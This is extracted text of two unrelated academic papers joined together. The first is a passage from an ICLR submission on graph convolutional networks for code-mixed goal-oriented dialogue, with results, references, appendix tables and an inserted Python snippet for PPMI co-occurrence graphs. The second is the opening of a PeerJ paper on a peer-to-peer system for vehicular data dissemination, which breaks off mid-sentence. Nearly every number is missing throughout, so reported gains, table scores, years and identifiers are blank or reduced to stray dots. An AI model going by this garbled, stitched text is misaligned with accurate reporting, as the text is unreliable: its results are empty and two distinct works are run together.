candidate from a list of candidates as opposed to generating it. our model outperforms all of the retrieval and generation based models. we obtain a gain of . in the per-response accuracy compared to the previous retrieval based state-of-the-art model of seo et al. ( ), which is a very strong baseline for our generation based model. we call this a strong baseline because the candidate selection task of this model is easier than the response generation task of our model. we also obtain a gain of . bleu points, rouge points and . entity f points compared to current state-of-the-art generation based models. results on code-mixed datasets and effect of using rnns: the results of our experiments on the code-mixed datasets are reported in table . our model outperforms the baseline models on all the code-mixed languages. one common observation from the results over all the languages (including en-dstc ) is that rnn+gcn-sea performs better than gcn-sea. similar observations were made by marcheggiani & titov ( ) for the task of semantic role labeling. effect of using hops: as we increased the number of hops of gcns, we observed a decrease in the performance. one reason for such a drop in performance could be that the average utterance length is very small ( . words). thus, there isn’t much scope for capturing distant neighbourhood information and more hops can add noisy information. please refer to appendix b for detailed results about the effect of varying the number of hops. frequency vs ppmi graphs: we observed that ppmi based contextual graphs were slightly bet- ter than frequency based contextual graphs (see appendix c). in particular, when using ppmi as opposed to frequency based contextual graph, we observed a gain of . in per-response accuracy, . in bleu, . in rouge and . in entity f score when averaged across all the code-mixed languages. effect of using random graphs: gcn-sea-random and gcn-sea-structure take the token embeddings directly instead of passing them though an rnn. this ensures that the difference in performance of the two models are not influenced by the rnn encodings. 
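To make the contextual graphs compared in these experiments concrete, the following sketch builds a sentence-window co-occurrence matrix over a corpus, converts it to PPMI, and links two words of a sentence when their score exceeds a threshold, as described in the contextual graph creation section above. The function names and the threshold value are illustrative assumptions, not the authors' implementation.

```python
import numpy as np
from collections import Counter
from itertools import combinations

def cooccurrence_counts(corpus):
    """corpus: list of tokenized sentences; the context window is the whole sentence."""
    counts = Counter()
    for sent in corpus:
        for w1, w2 in combinations(set(sent), 2):
            counts[(w1, w2)] += 1
            counts[(w2, w1)] += 1   # keep the matrix symmetric
    return counts

def ppmi(counts):
    """Convert raw co-occurrence counts to positive pointwise mutual information."""
    total = sum(counts.values())
    word_tot = Counter()
    for (w1, _), c in counts.items():
        word_tot[w1] += c
    scores = {}
    for (w1, w2), c in counts.items():
        pmi = np.log((c * total) / (word_tot[w1] * word_tot[w2]))
        scores[(w1, w2)] = max(pmi, 0.0)   # clip negative PMI to zero
    return scores

def contextual_edges(sentence, scores, threshold=1.0):
    """Connect two words of a sentence if their (PPMI or frequency) score exceeds the threshold."""
    return [(w1, w2) for w1, w2 in combinations(set(sentence), 2)
            if scores.get((w1, w2), 0.0) > threshold]
```

Using the raw counts directly in contextual_edges corresponds to the frequency-based graph, while passing the ppmi scores corresponds to the PPMI-based graph compared above.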
the results are shown in table and we observe a drop in performance for gcn-random across all the languages. this under review as a conference paper at iclr dataset model per-resp. bleu rouge entity f acc l en-dstc gcn-sea+random . . . . . . gcn-sea+structure . . . . . . hi-dstc gcn-sea+random . . . . . . gcn-sea+structure . . . . . . be-dstc gcn-sea+random . . . . . . gcn-sea+structure . . . . . . gu-dstc gcn-sea+random . . . . . . gcn-sea+structure . . . . . . ta-dstc gcn-sea+random . . . . . . gcn-sea+structure . . . . . . table : gcn-sea with random graphs and frequency co-occurrence graphs on all dstc datasets. shows that any random graph does not contribute to the performance gain of gcn-sea and the dependency and contextual structures do play an important role. ablations : we experiment with replacing the sequential attention by the bahdanau attention (bah- danau et al., ). we also experiment with various combinations of rnns and gcns as encoders. the results are shown in table (appendix d). we observed that gcns do not outperform rnns independently. in general, rnn-bahdanau attention performs better than gcn-bahdanau attention. the sequential attention mechanism outperforms bahdanau attention as observed from the following comparisons (i) gcn-bahdanau attention vs gcn-sea, (ii) rnn-bahdanau attention vs rnn-sea (in bleu and rouge) and (iii) rnn+gcn-bahdanau attention vs rnn+gcn-sea. overall, the best results are always obtained by our final model which combines rnn, gcn and sequential attention. conclusion we showed that structure aware representations are useful in goal-oriented dialogue and we obtain state-of-the art performance on the modified dstc dataset and its recently released code-mixed versions. we used gcns to infuse structural information of dependency graphs and contextual graphs to enrich the representations of the dialogue context and kb. we also proposed a sequential attention mechanism for combining the representations of (i) query (current utterance), (ii) conver- sation history and (ii) the kb. finally, we empirically showed that when dependency parsers are not available for certain languages such as code-mixed languages then we can use word co-occurrence frequencies and ppmi values to extract a contextual graph and use such a graph with gcns for improved performance. references dzmitry bahdanau, kyunghyun cho, and yoshua bengio. neural machine translation by jointly learning to align and translate. international conference on learning representations, . url http://arxiv.org/abs/ . . suman banerjee, nikita moghe, siddhartha arora, and mitesh m. khapra. a dataset for building code-mixed goal oriented conversation systems. in proceedings of the th international confer- ence on computational linguistics, pp. – . association for computational linguistics, . url http://aclweb.org/anthology/c - . joost bastings, ivan titov, wilker aziz, diego marcheggiani, and khalil simaan. graph convolu- tional encoders for syntax-aware neural machine translation. in proceedings of the con- ference on empirical methods in natural language processing, pp. – . association for computational linguistics, . url http://aclweb.org/anthology/d - . antoine bordes, y-lan boureau, and jason weston. learning end-to-end goal-oriented dialog. international conference on learning representations, . url http://arxiv.org/ abs/ . . http://arxiv.org/abs/ . http://aclweb.org/anthology/c - http://aclweb.org/anthology/d - http://arxiv.org/abs/ . http://arxiv.org/abs/ . 
under review as a conference paper at iclr huadong chen, shujian huang, david chiang, and jiajun chen. improved neural machine trans- lation with a syntax-aware encoder and decoder. in proceedings of the th annual meet- ing of the association for computational linguistics (volume : long papers), pp. – . association for computational linguistics, . doi: . /v /p - . url http://www.aclweb.org/anthology/p - . kyunghyun cho, bart van merrienboer, caglar gulcehre, dzmitry bahdanau, fethi bougares, hol- ger schwenk, and yoshua bengio. learning phrase representations using rnn encoder–decoder for statistical machine translation. in proceedings of the conference on empirical methods in natural language processing (emnlp), pp. – . association for computational lin- guistics, . doi: . /v /d - . url http://www.aclweb.org/anthology/ d - . kenneth ward church and patrick hanks. word association norms mutual information, and lex- icography. computational linguistics, ( ), . url http://www.aclweb.org/ anthology/j - . ido dagan, shaul marcus, and shaul markovitch. contextual word similarity and estimation from sparse data. in st annual meeting of the association for computational linguistics, . url http://www.aclweb.org/anthology/p - . michaël defferrard, xavier bresson, and pierre vandergheynst. convolutional neural networks on graphs with fast localized spectral filtering. in d. d. lee, m. sugiyama, u. v. luxburg, i. guyon, and r. garnett (eds.), advances in neural information processing systems , pp. – . curran associates, inc., . david k duvenaud, dougal maclaurin, jorge iparraguirre, rafael bombarell, timothy hirzel, alan aspuru-guzik, and ryan p adams. convolutional networks on graphs for learning molecular fingerprints. in c. cortes, n. d. lawrence, d. d. lee, m. sugiyama, and r. garnett (eds.), advances in neural information processing systems , pp. – . curran associates, inc., . jeffrey l. elman. finding structure in time. cognitive science, ( ): – , . mihail eric and christopher manning. a copy-augmented sequence-to-sequence architecture gives good performance on task-oriented dialogue. in proceedings of the th conference of the euro- pean chapter of the association for computational linguistics: volume , short papers, pp. – . association for computational linguistics, . url http://aclweb.org/ anthology/e - . mihail eric, lakshmi krishnan, francois charette, and christopher d. manning. key-value retrieval networks for task-oriented dialogue. in proceedings of the th annual sigdial meeting on discourse and dialogue, saarbrücken, germany, august - , , pp. – , . url https://aclanthology.info/papers/w - /w - . akiko eriguchi, kazuma hashimoto, and yoshimasa tsuruoka. tree-to-sequence attentional neural machine translation. in proceedings of the th annual meeting of the association for computa- tional linguistics (volume : long papers), pp. – . association for computational linguis- tics, . doi: . /v /p - . url http://www.aclweb.org/anthology/ p - . kaiming he, xiangyu zhang, shaoqing ren, and jian sun. deep residual learning for image recog- nition. in ieee conference on computer vision and pattern recognition, cvpr , las vegas, nv, usa, june - , , pp. – , . doi: . /cvpr. . . url https://doi.org/ . /cvpr. . . matthew henderson, blaise thomson, and jason d. williams. the second dialog state tracking challenge. in proceedings of the sigdial conference, the th annual meeting of the special interest group on discourse and dialogue, - june , philadelphia, pa, usa, pp. – , a. 
url http://aclweb.org/anthology/w/w /w - .pdf. http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/d - http://www.aclweb.org/anthology/d - http://www.aclweb.org/anthology/j - http://www.aclweb.org/anthology/j - http://www.aclweb.org/anthology/p - http://aclweb.org/anthology/e - http://aclweb.org/anthology/e - https://aclanthology.info/papers/w - /w - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - https://doi.org/ . /cvpr. . http://aclweb.org/anthology/w/w /w - .pdf under review as a conference paper at iclr matthew henderson, blaise thomson, and jason d. williams. the third dialog state tracking chal- lenge. in ieee spoken language technology workshop, slt , south lake tahoe, nv, usa, december - , , pp. – , b. doi: . /slt. . . url https://doi.org/ . /slt. . . daniel d. johnson. learning graphical state transitions. international conference on learning representations, . diederik p. kingma and jimmy ba. adam: a method for stochastic optimization. international conference on learning representations, . thomas n. kipf and max welling. semi-supervised classification with graph convolutional net- works. international conference on learning representations, . yujia li, daniel tarlow, marc brockschmidt, and richard s. zemel. gated graph sequence neural networks. corr, abs/ . , . url http://arxiv.org/abs/ . . chin-yew lin. rouge: a package for automatic evaluation of summaries. in text summarization branches out, . url http://www.aclweb.org/anthology/w - . fei liu and julien perez. gated end-to-end memory networks. in proceedings of the th confer- ence of the european chapter of the association for computational linguistics, eacl , valencia, spain, april - , , volume : long papers, pp. – , . url https: //aclanthology.info/papers/e - /e - . andrea madotto, chien-sheng wu, and pascale fung. mem seq: effectively incorporating knowledge bases into end-to-end task-oriented dialog systems. in proceedings of the th an- nual meeting of the association for computational linguistics (volume : long papers), pp. – . association for computational linguistics, . url http://aclweb.org/ anthology/p - . diego marcheggiani and ivan titov. encoding sentences with graph convolutional networks for semantic role labeling. in proceedings of the conference on empirical methods in natural language processing, pp. – . association for computational linguistics, . url http://aclweb.org/anthology/d - . diego marcheggiani, joost bastings, and ivan titov. exploiting semantics in neural machine trans- lation with graph convolutional networks. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technolo- gies, volume (short papers), pp. – . association for computational linguistics, . url http://aclweb.org/anthology/n - . ivan titov nicola de cao, wilker aziz. question answering by reasoning across documents with graph convolutional networks. arxiv preprint arxiv: . , . yoshiki niwa and yoshihiko nitta. co-occurrence vectors from corpora vs. distance vectors from dictionaries. in proceedings of the th conference on computational linguistics - volume , coling ’ , pp. – , stroudsburg, pa, usa, . association for computational linguis- tics. doi: . / . . url https://doi.org/ . / . . kishore papineni, salim roukos, todd ward, and wei-jing zhu. bleu: a method for automatic evaluation of machine translation. 
in proceedings of the th annual meeting of the association for computational linguistics, july - , , philadelphia, pa, usa., pp. – , . url http://www.aclweb.org/anthology/p - .pdf. nanyun peng, hoifung poon, chris quirk, kristina toutanova, and wen-tau yih. cross-sentence n-ary relation extraction with graph lstms. transactions of the association for computational linguistics, : – , . issn - x. url https://www.transacl.org/ ojs/index.php/tacl/article/view/ . minjoon seo, sewon min, ali farhadi, and hannaneh hajishirzi. query-reduction networks for question answering. international conference on learning representations, . https://doi.org/ . /slt. . http://arxiv.org/abs/ . http://www.aclweb.org/anthology/w - https://aclanthology.info/papers/e - /e - https://aclanthology.info/papers/e - /e - http://aclweb.org/anthology/p - http://aclweb.org/anthology/p - http://aclweb.org/anthology/d - http://aclweb.org/anthology/n - https://doi.org/ . / . http://www.aclweb.org/anthology/p - .pdf https://www.transacl.org/ojs/index.php/tacl/article/view/ https://www.transacl.org/ojs/index.php/tacl/article/view/ under review as a conference paper at iclr iulian vlad serban, alessandro sordoni, yoshua bengio, aaron c. courville, and joelle pineau. building end-to-end dialogue systems using generative hierarchical neural network models. in proceedings of the thirtieth aaai conference on artificial intelligence, february - , , phoenix, arizona, usa., pp. – , . url http://www.aaai.org/ocs/ index.php/aaai/aaai /paper/view/ . nitish srivastava, geoffrey e. hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. dropout: a simple way to prevent neural networks from overfitting. journal of machine learn- ing research, ( ): – , . url http://dl.acm.org/citation.cfm?id= . rupesh kumar srivastava, klaus greff, and jürgen schmidhuber. highway networks. corr, abs/ . , . url http://arxiv.org/abs/ . . sainbayar sukhbaatar, arthur szlam, jason weston, and rob fergus. end-to-end mem- ory networks. in advances in neural information processing systems : annual con- ference on neural information processing systems , december - , , montreal, quebec, canada, pp. – , . url http://papers.nips.cc/paper/ -end-to-end-memory-networks. shikhar vashishth, shib sankar dasgupta, swayambhu nath ray, and partha talukdar. dating docu- ments using graph convolution networks. in proceedings of the th annual meeting of the asso- ciation for computational linguistics (volume : long papers), pp. – . association for computational linguistics, . url http://aclweb.org/anthology/p - . tsung-hsien wen, david vandyke, nikola mrkšić, milica gasic, lina m. rojas barahona, pei-hao su, stefan ultes, and steve young. a network-based end-to-end trainable task-oriented dialogue system. in proceedings of the th conference of the european chapter of the association for computational linguistics: volume , long papers, pp. – . association for computational linguistics, . url http://aclweb.org/anthology/e - . jason d. williams and steve j. young. partially observable markov decision processes for spoken dialog systems. computer speech & language, ( ): – , . doi: . /j.csl. . . . url https://doi.org/ . /j.csl. . . . jason d. williams, antoine raux, deepak ramachandran, and alan w. black. the dialog state tracking challenge. in proceedings of the sigdial conference, the th annual meeting of the special interest group on discourse and dialogue, - august , su- pelec, metz, france, pp. – , . url http://aclweb.org/anthology/w/ w /w - .pdf. steve j. young. 
probabilistic methods in spoken-dialogue systems. philosophical transac- tions: mathematical, physical and engineering sciences, ( ): – , . issn x. url http://www.jstor.org/stable/ . tiancheng zhao, allen lu, kyusong lee, and maxine eskenazi. generative encoder-decoder mod- els for task-oriented spoken dialog systems with chatting capability. in proceedings of the th annual sigdial meeting on discourse and dialogue, pp. – . association for computational linguistics, . url http://aclweb.org/anthology/w - . http://www.aaai.org/ocs/index.php/aaai/aaai /paper/view/ http://www.aaai.org/ocs/index.php/aaai/aaai /paper/view/ http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://arxiv.org/abs/ . http://papers.nips.cc/paper/ -end-to-end-memory-networks http://papers.nips.cc/paper/ -end-to-end-memory-networks http://aclweb.org/anthology/p - http://aclweb.org/anthology/e - https://doi.org/ . /j.csl. . . http://aclweb.org/anthology/w/w /w - .pdf http://aclweb.org/anthology/w/w /w - .pdf http://www.jstor.org/stable/ http://aclweb.org/anthology/w - under review as a conference paper at iclr a. code-mixing statistics and dialogue example hindi bengali gujarati tamil vocabulary size code-mixed english vocabulary native language vocabulary others vocabulary unique utterances utterances with code-mixed words pure native language utterances pure english utterances average length of utterances . . . . average # of code-mixed utterances per dialog . . . . table : statistics about code-mixing in the dataset (banerjee et al., ). english hindi-english codemixed user <silence> <silence> bot hello, welcome to the cambridge restaurant system. you can ask for restaurants by area, price range or food type. how may i help you ? hello , cambridge restaurant system mein aapka swagat hai. aap pa sakte hai restaurant by area, price range ya food type. aap ko kaise help kar sakta hu main ? user im looking for a moderately priced restaurant. mein moderately priced restaurant dhund raha hoon. bot what kind of food would you like ? aap kaunse type ka food lena chahege? user it doesnt matter. matter nahi karta. bot what part of town do you have in mind ? aapke mind me town ka kaun sa part hai ? user the south part of town. south part of town. bot api call r cuisine south moderate api call r cuisine south moderate kb triples: pizza hut cherry hinton r post code pizza hut cherry hinton post code pizza hut cherry hinton r cuisine italian pizza hut cherry hinton r location south pizza hut cherry hinton r phone pizza hut cherry hinton phone pizza hut cherry hinton r address pizza hut cherry hinton address pizza hut cherry hinton r price moderate pizza hut cherry hinton r rating restaurant alimentum r post code restaurant alimentum post code restaurant alimentum r cuisine european restaurant alimentum r location south restaurant alimentum r phone restaurant alimentum phone restaurant alimentum r address restaurant alimentum address restaurant alimentum r price moderate restaurant alimentum r rating user <silence> <silence> bot restaurant alimentum is a nice restaurant in the south of town serving modern european food. restaurant alimentum ek bohot hi accha restaurant hai south town me jo modern european food serve karta hai user can i get the address ? kya mujhe address mil sakta hai bot sure, restaurant alimentum is on restaurant alimentum address. bilkul, restaurant alimentum restaurant alimentum address par hai user and whats the phone number for that ? aur iska phone number kya hai ? 
bot the phone number of restaurant alimentum is restaurant alimentum phone. restaurant alimentum ka phone number hai restaurant alimentum phone user okay, thank you, good bye. theek, thank you, good bye. bot you are welcome. welcome, alvida. table : example dialogues from the dstc dataset in english and in hindi-english code-mixed languages. the english words which are mixed in hindi are italicized. under review as a conference paper at iclr b. effect of using hops: dataset model per-resp. bleu rouge entity f acc l en-dstc gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . hi-dstc gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . be-dstc gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . gu-dstc gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . ta-dstc gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . table : gcn-sea with multiple hops on all dstc datasets c. frequency vs ppmi co-occurrence dataset model per-resp. bleu rouge entity f acc l en-dstc gcn-sea+freq . . . . . . gcn-sea+ppmi . . . . . . hi-dstc gcn-sea+freq . . . . . . gcn-sea+ppmi . . . . . . be-dstc gcn-sea+freq . . . . . . gcn-sea+ppmi . . . . . . gu-dstc gcn-sea+freq . . . . . . gcn-sea+ppmi . . . . . . ta-dstc gcn-sea+freq . . . . . . gcn-sea+ppmi . . . . . . table : rnn+gcn-sea with different contextual graphs on all dstc datasets under review as a conference paper at iclr d. ablation results dataset model per-resp.acc bleu rouge entity f l hi-dstc seq seq-bahdanau attn . . . . . . gcn-bahdanau attn . . . . . . rnn+gcn-bahdanau attn . . . . . . rnn-sea . . . . . . rnn+gcn-sea . . . . . . be-dstc seq seq-bahdanau attn . . . . . . gcn-bahdanau attn . . . . . . rnn+gcn-bahdanau attn . . . . . . rnn-sea . . . . . . rnn+gcn-sea . . . . . . gu-dstc seq seq-bahdanau attn . . . . . . gcn-bahdanau attn . . . . . . rnn+gcn-bahdanau attn . . . . . . rnn-sea . . . . . . rnn+gcn-sea . . . . . . ta-dstc seq seq-bahdanau attn . . . . . . gcn-bahdanau attn . . . . . . rnn+gcn-bahdanau attn . . . . . . rnn-sea . . . . . . rnn+gcn-sea . . . . . . en-dstc seq seq-bahdanau attn . . . . . . gcn-bahdanau attn . . . . . . rnn+gcn-bahdanau attn . . . . . . rnn-sea . . . . . . rnn+gcn-sea . . . . . . table : ablation results of various models on all versions of dstc . introduction related work background gcn for undirected graphs syntactic gcn model query encoder dialogue history encoder kb encoder sequential attention decoder contextual graph creation experimental setup datasets hyperparameters models compared results and discussions conclusion d v: a peer-to-peer architecture for data dissemination in smartphone-based vehicular applications submitted may accepted july published august corresponding author michele amoretti, michele.amoretti@unipr.it academic editor xiaodong wang additional information and declarations can be found on page doi . /peerj-cs. copyright picone et al. distributed under creative commons cc-by . open access d v: a peer-to-peer architecture for data dissemination in smartphone-based vehicular applications marco picone, michele amoretti, gianluigi ferrari and francesco zanichelli department of information engineering, università degli studi di parma, italy abstract vehicular data collection applications are emerging as an appealing technology to monitor urban areas, where a high concentration of connected vehicles with onboard sensors is a near future scenario. 
in this context, smartphones are, on one side, effective enablers of vehicle-to-vehicle (v v) and vehicle-to-infrastructure (v i) applications and, on the other side, highly sophisticated sensing platforms. in this paper, we introduce an effective and efficient system, denoted as d v, to disseminate vehicle-related information and sensed data using smartphones as v i devices. d v relies on a peer-to-peer (p p) overlay scheme, denoted as distributed geographic table (dgt), which unifies the concepts of physical and virtual neighborhoods in a scalable and robust infrastructure for application-level services. first, we investigate the discovery procedure of the dgt overlay network, through analytical and simulation results. then, we present and discuss an extensive simulation-based performance evaluation (considering relevant performance indicators) of the d v system, in a g wireless communication scenario. the simulation methodology combines deus (an application-level simulation tool for the study of large-scale systems) with ns- (a well-known network simulator, which takes into account lower layers), in order to provide a d v proof-of-concept. the observed results show that d v-based information sharing among vehicles allows to significantly reduce risks and nuisances (e.g., due to road defects and congestions). subjects computer networks and communications, distributed and parallel computing, mobile and ubiquitous computing keywords vehicular sensor networks (vsns), smartphones, peer-to-peer (p p), vehicle-to-infrastructure (v i), localization introduction driving safely, efficiently, and comfortably depends certainly on the vehicle status and on the driver behavior. however, a large number of external factors (e.g., traffic congestions, road defects, etc.) have a relevant impact and are difficult to predict without the support of ict technologies. among others, vehicular inter-networking has a prominent role (hartenstein & laberteaux, ), paving the way to several valuable applications, such as geocasting, mobile data sensing and storage, street-level traffic flow estimation, and others (lee & gerla, ). vehicular inter-networking builds upon how to cite this article picone et al. ( ), d v: a peer-to-peer architecture for data dissemination in smartphone-based vehicular applications. peerj comput. sci. :e ; doi . /peerj-cs. mailto:michele.amoretti@unipr.it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. vehicle-to-vehicle (v v) and vehicle-to-infrastructure (v i) communications, as well as on hybrid variants (hartenstein & laberteaux, ). recently, the vehicular sensor network (vsn) research community has started investigating the possibility of using smartphones as v v and v i communication nodes, but also as portable sensing platforms (gerla & kleinrock, ). smartphones are characterized by an ever improving technology—in terms of computational, networking, and storage capabilities—and good (practically ubiquitous) connectivity. users often carry such powerful handheld devices in their cars, to take advantage of multimedia playback, navigation assistance, as well as internet connectivity. 
thus, in the near future, many vehicles may be exploited as mobile sensors to gather, process, and transmit data harvested along the roads in urban and extra-urban environments, potentially encompassing multi- ple types of information ranging from traffic/road conditions to pollution data and others. as a matter of fact, until support for ad-hoc wifi connectivity or for the new wi-fi- direct standard (wi-fi alliance) will be widespread, smartphone-based vsns will require the presence of a communication infrastructure (e.g., g/ g cellular networks, wimax). therefore, they will share the advantages of v i schemes over v v technologies, namely a better support in commercial off-the-shelf (cots) equipment, native long-range communication capabilities as well as support for broadcast or multicast communications (to the application level, at least). at the same time, cellular-network vsns exhibit some disadvantages with respect to v v schemes, such as: higher latency at short distances; local communication obtained only indirectly and by adding overhead; the need for service coverage; and the associated data traffic costs. while hybrid communication schemes, i.e., combining v v with v i capabilities, would inherently provide the most effective and robust solution, we remark that purely infrastructure-based communication does not limit the application level of data dissemination and processing to a specific centralized architecture. in fact, a v i infras- tructure does not necessarily imply a centralized organization, which would inevitably lead to scalability issues—for example, to cope with the information requirements of thousands or millions of vehicles moving around in a large metropolitan area. while multiple distributed (e.g., hierarchical) subsystems can be deployed to achieve better scalability, a completely decentralized peer-to-peer (p p) approach is more appealing. initially exploited within v v schemes (mahmoud & olariu, ), p p approaches have been recently adopted also to implement decentralized traffic information systems (tiss) (santa, moragon & gomez-skarmeta, ). in fact, p p strategies allow respon- sibility decentralization, as well as computational and communication load balancing, which can be beneficial for smartphone-based vsns (rybicki et al., ). in the context of p p tiss, in this paper we introduce the d v architecture, based on opportunistic mechanisms for the dissemination of data generated by vehicle sensors and drivers. d v requires no dedicated hardware and leverages upon cots and worldwide available devices (such as smartphones), rather than dedicated devices. smartphones are usually affected by high energy consumption when using networks and gps. however, this is not a real issue for vehicular applications, since smartphones will typically be connected picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. to an in-vehicle power source while using d v. to the best of our knowledge, d v is the only tis providing, at the same time, massive scalability (because of its p p nature), deployability (because of the light hardware requirements), and message configurability. with respect to the state of the art, d v has a higher coverage percentage—the ratio between the number of peers that actually receive a specific message and the total number of those which should receive it—with less bandwidth requirements. 
d v is based on a p p overlay scheme denoted as distributed geographical table (dgt) (picone, amoretti & zanichelli, a; picone, amoretti & zanichelli, b)—indeed, d v stands for dgt for vsns. the dgt overlay scheme represents a scalable and robust infrastructure for application-level services, and relies on the unification of the concepts of geographical and virtual neighborhoods (picone, amoretti & zanichelli, a). the dgt assumes that each peer knows its global position (gp)—which is reasonable, as nowadays every mobile device is equipped with a global positioning system (gps). the main contributions of this paper can be summarized as follows: . the introduction of the d v system, with its opportunistic dissemination strategy for vehicular information and sensed data; . a sound analytical framework for performance evaluation of the dgt-based proactive neighbor localization protocol embedded in d v; the dgt is introduced and partially analyzed in picone, amoretti & zanichelli ( a), picone, amoretti & zanichelli ( b); . the performance evaluation of the d v, by means of multi-layer discrete event simulations, using realistic vehicle motion patterns and taking into account dangerous road stretches and traffic jams. in particular, we apply a recently proposed methodol- ogy (amoretti et al., ) to integrate deus, an application-level simulation tool for the study of large-scale systems (amoretti, agosti & zanichelli, ), with ns- , a widely used simulation tool which takes into account lower layers (ns- development team). the paper is organized as follows. section ‘related work’ provides a summary of the state of the art about vsns. section ‘distributed geographic table’ recalls the main dgt concepts. section ‘d v system’ illustrates the principles of the d v system for traffic and sensed data dissemination. section ‘mobility model’ illustrates the main aspects of the mobility model used to characterize realistic vehicular scenarios. in sectiion ‘performance evaluation’, the results of the performance analysis of the proposed d v system are presented: section ‘dgt-based proactive localization’ is dedicated to the analytical and simulation-based performance analysis of the dgt-based discovery protocol embedded in d v; section ‘d v performance evaluation’ analyzes the performance of d v (both its dgt sublayer and its opportunistic dissemination strategy). finally, section ‘conclusions’ concludes the paper. related work several data dissemination strategies for vsns have been proposed in the literature (lee & gerla, ). a fundamental issue is connectivity: different wireless access and communi- cation methods have been evaluated, including dedicated short-range communication picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. (dsrc) (jiang et al., ), wimax/ . e (han et al., ), wlan (hadaller et al., ), as well as cellular systems (qureshi, carlisle & guttag, ). the use of a cellular communication network reduces the problem of implementing a working tis, but introduces, on the other hand, the issue of collecting and distributing data to interested users. in the following, we discuss some relevant research works related to vsns, distinguishing between v v and v i approaches. v v approaches most v v architectures rely on in-network aggregation mechanisms to improve communication efficiency by summarizing information that is exchanged between vehicles (dietzel et al., ). 
for example, in one of the earliest works in v v communications, lee et al. ( ) proposed mobeyes, a strategy for harvesting, aggregating, and distributing sensed data by means of proactive urban monitoring services provided by vehicles which continuously discover, maintain, and process information about events in an urban scenario. messages and summaries are routed to vehicles in the proximity, to achieve common goals, such as providing police cars with the trajectories of specific target cars. later, meneguette et al. ( ) proposed a network partition-aware geographical data dissemination protocol, which eliminates the broadcast storm and maximizes the data dissemination capability across network partitions with short delays and low overhead, at the expense of a high number of message transmitted. the same issue affects dove, proposed by yan, zhang & wang ( ). v v communication technology could mitigate traffic collisions and improve traffic congestion by exchanging basic safety information such as location, speed, and direction between vehicles within range of each other. recently, xiang et al. ( ) modeled vehicles’ data preferences and explored the feasibility and benefits of incorporating these preferences into the design of safety data dissemination protocols. furthermore, they designed pvcast, which assigns a higher transmission priority to packets that can satisfy a higher total data preferences of vehicles in the network by broadcasting. as a result, the differentiated transmission priorities of packets reduce contention and collision. another important aspect is the relationship between data dissemination performance and traffic congestion. du & dao ( ) recently developed analytical formulations to estimate information propagation time delay via a v v communication network formed on a one-way or two-way road segment with multiple lanes. the proposed study carefully involves several critical communication and traffic flow features in reality, such as wireless communication interference, intermittent information transmission, and dynamic traffic flow. moreover, this study elaborately analyzes the interactions between information and traffic flow under sparse and congested traffic flow conditions. v i approaches cellular networks are used in participatory vsn platforms, enabling applications such as ride quality monitoring, street-level traffic flow estimation, and proactive urban picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. surveillance (hull et al., ; burke et al., ; mohan, padmanabhan & ramjee, ; mun et al., ). initially, most participatory vsn platforms were based on the client/server paradigm, where all data generated by vehicles are stored in a central server (or server farm). hull et al. ( ) pointed out that the major technical challenges of such a solution are mostly related with the huge amount of simultaneous updates and queries generated by user moves and requests (each car is a source of queries and regularly sends its own measurements). for these reasons, researchers started investigating architectures based on the p p paradigm, to build a distributed tis where cars are not only consumers but also producers of information. rybicki et al. ( ) with peers on wheels and, more recently, with peertis (jedrzej et al., ), proposed v i architectures where participating cars are peers organized in a distributed hash table (dht). 
roads are divided into road segments, each with a unique id that is used as key in the dht. the main idea is that each peer is responsible for a certain part of the id space and, consequently, for a certain number of road segments. up to now, one of the troubling issues is the fact that obtaining full information about planned and alternative routes is expensive in terms of bandwidth consumption. santa, moragon & gomez-skarmeta ( ) presented another p p approach based on cellular networks and on the jxta middleware (sun microsystems, inc, ), to enable the transmission of information among vehicles and between vehicles and infrastructure, bounding the propagation of messages with respect to time and space (santa, moragon & gomez-skarmeta, ). a more recent location-aware p p overlay scheme for smart traffic applications is overdrive, developed by heep et al. ( ). overdrive builds a geographical neighborhood for each peer, taking into account not only peers’ positions, but also their speeds and directions. traffic information is then disseminated by means of efficient flooding mechanisms. distributed geographic table a structured decentralized p p overlay is characterized by a controlled overlay, shaped in a way that resources (or resource descriptors) are placed at appropriate locations (amoretti, ). moreover, a globally consistent protocol ensures that any peer can efficiently route a search to the peers that have the desired resource, even if the resource is extremely rare. beyond basic routing correctness, two important topology constraints guarantee that (i) the maximum number of hops in any route (route length) is small, so that requests are fulfilled quickly, and (ii) the maximum number of neighbors of any peer (maximum node degree) is small, so that maintenance overhead is not excessive. the dgt is a structured overlay scheme where each participant can efficiently retrieve information located near any chosen geographic position (picone, amoretti & zanichelli, a). in such a system, the responsibility for maintaining information about the position of active peers is distributed, for which a change in the set of participants causes minimal disruption. in the following, we recall the main dgt concepts using the p p system notation introduced by aberer et al. ( ). picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. in a generic dgt overlay, the set of peers is called p , each peer being characterized by a unique identifier id ∈ i (where i is the space of identifiers). the space of world’s coordinates is denoted as w and w ∈ w , w = ⟨latitude,longitude⟩ is a generic position. thus, a peer p ∈ p may be identified by the pair ⟨idp,wp⟩, where idp ∈ i and wp ∈ w . the distance d between two peers is defined as the actual geographic distance between their locations in the real world (also known as great-circle distance or orthodromic distance (longley et al., )). the neighborhood of a geographic location is the group of peers located inside a given region surrounding that location. the main service provided by the dgt overlay is request routing, allowing to find available peers in a specific region, i.e., 